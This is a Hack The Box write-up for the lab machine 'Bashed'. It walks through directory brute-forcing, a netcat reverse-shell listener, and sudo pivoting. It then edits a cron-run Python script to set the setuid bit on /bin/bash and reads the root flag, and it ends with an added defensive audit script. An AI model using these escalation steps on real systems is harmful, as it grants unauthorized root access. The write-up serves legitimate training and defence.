Bashed - Hack The Box
Reconnaissance
- Gobuster
gobuster dir -u http://10.10.10.68/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Exploitation
- Send reverse shell
nc -nlvp 9000
Post-exploitation
- List sudoers
sudo -l
We can execute commands as the scriptmanager user.
- User Pivoting
sudo -u scriptmanager bash
- Find scriptmanager files
find / -user scriptmanager 2>/dev/null | grep -vE "proc"
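- Find cron jobs with a bash script that watches for new processes
#!/bin/bash
# Snapshot the process list, then print every line that appears or disappears.
old_process=$(ps -eo user,command)
echo -e "[+] Listing new commands...\n\n"
while true; do
    new_process=$(ps -eo user,command)
    # Keep only the added/removed lines and hide this monitor and kernel workers
    diff <(echo "$old_process") <(echo "$new_process") | grep "[\>\<]" | grep -vE "procmon|kworker"
    old_process=$new_process
done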
- Change the test.py script
import os
os.system("chmod u+s /bin/bash")
- Check the SUID bit on /bin/bash and read the root flag
ls -l /bin/bash
bash -p
cat /root/root.txt
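
The escalation above relies on a scheduled job running test.py with enough privilege to change /bin/bash while scriptmanager can edit the file. The following audit is an added example, not part of the original write-up: it flags a job script (or its parent directory) that an untrusted account can modify, and shells that carry the setuid bit. The function names and the optional TRUSTED_UID argument are assumptions made for this example.

```sh
#!/bin/sh
# Added defensive example (not from the original write-up).
# TRUSTED_UID defaults to 0 (root); it is a parameter so the checks can be
# exercised without root. Function bodies use ( ) so variables stay local.

# check_path PATH [TRUSTED_UID]: exit 0 if clean, 1 on findings, 2 if unreadable.
check_path() (
    path=$1; trusted=${2:-0}; rc=0
    set -f                                   # no globbing when splitting ls output
    set -- $(ls -ldn -- "$path" 2>/dev/null) # POSIX: <mode> <links> <uid> <gid> ...
    [ $# -ge 3 ] || exit 2
    mode=$1; owner=$3
    if [ "$owner" != "$trusted" ]; then
        echo "FINDING: $path is owned by uid $owner, not $trusted"; rc=1
    fi
    case $mode in ?????w*) echo "FINDING: $path is group-writable"; rc=1 ;; esac
    case $mode in ????????w*) echo "FINDING: $path is world-writable"; rc=1 ;; esac
    exit $rc
)

# audit_job_file FILE [TRUSTED_UID]: check a script that a privileged job runs,
# plus its parent directory (a writable parent can let the file be replaced).
audit_job_file() (
    rc=0
    check_path "$1" "${2:-0}" || rc=1
    check_path "$(dirname -- "$1")" "${2:-0}" || rc=1
    exit $rc
)

# suid_shells PATH...: report shells that carry the setuid bit.
suid_shells() (
    rc=0
    for sh in "$@"; do
        if [ -u "$sh" ]; then echo "FINDING: $sh has the setuid bit set"; rc=1; fi
    done
    exit $rc
)

# Usage: sh audit.sh /path/to/script-run-by-root
if [ $# -gt 0 ]; then
    audit_job_file "$1"
    suid_shells /bin/bash /bin/sh /bin/dash
fi
```

Any finding on a script that root executes means the job should run a root-owned copy in a root-owned directory, or run as the account that owns the file.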